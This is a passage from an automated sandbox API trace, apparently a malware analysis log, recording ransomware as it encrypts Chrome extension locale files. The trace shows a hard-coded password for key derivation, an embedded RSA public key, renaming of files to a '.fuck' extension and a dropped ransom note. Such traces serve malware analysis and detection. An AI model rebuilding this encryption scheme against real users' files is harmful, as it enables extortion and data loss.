lpOverlapped=0x0) returned 1 [0263.985] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.985] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.985] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.985] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.985] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.985] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.985] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.985] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.985] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.985] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.985] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.986] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.986] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.986] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.986] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.986] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.986] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.986] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.986] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.986] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.986] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.986] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.986] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.986] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.986] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.986] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.986] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.986] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.986] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.987] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.987] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.987] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.987] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.987] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.987] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.987] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.987] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.987] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.987] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.987] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.987] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.987] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.987] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.987] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.987] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.987] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.987] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.988] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.988] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.988] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.988] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.988] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.988] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.988] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x30e, lpOverlapped=0x0) returned 1 [0263.988] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x30e, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x310) returned 1 [0263.988] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x310, lpOverlapped=0x0) returned 1 [0263.988] CloseHandle (hObject=0x5d60) returned 1 [0263.988] CloseHandle (hObject=0x5d5c) returned 1 [0263.988] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json"), bFailIfExists=0) returned 1 [0263.995] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json", dwFileAttributes=0x0) returned 1 [0263.995] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.gsg")) returned 1 [0263.997] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.fuck")) returned 1 [0263.998] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0263.998] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0263.998] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.998] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.998] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0263.998] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\readme_back_files.htm")) returned 0xffffffff [0263.998] AreFileApisANSI () returned 1 [0263.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.998] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.999] GetFileType (hFile=0x5d64) returned 0x1 [0263.999] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0264.006] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0264.006] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0264.006] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.006] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.006] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0264.006] GetLastError () returned 0x0 [0264.006] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json")) returned 0x20 [0264.007] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json", dwFileAttributes=0x80) returned 1 [0264.007] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0264.008] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0264.009] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0264.009] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0264.011] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0264.011] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0264.011] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.011] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0264.011] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.011] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0264.011] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e752a8) returned 1 [0264.011] CryptImportPublicKeyInfo (in: hCryptProv=0x2e752a8, dwCertEncodingType=0x1, pInfo=0x2eaf3d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaf400*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaf408*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e900) returned 1 [0264.011] CryptEncrypt (in: hKey=0x2e7e900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0264.012] CryptEncrypt (in: hKey=0x2e7e900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e75440*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e75440*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0264.012] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e75440*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e75440*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0264.013] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.020] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.020] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.029] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 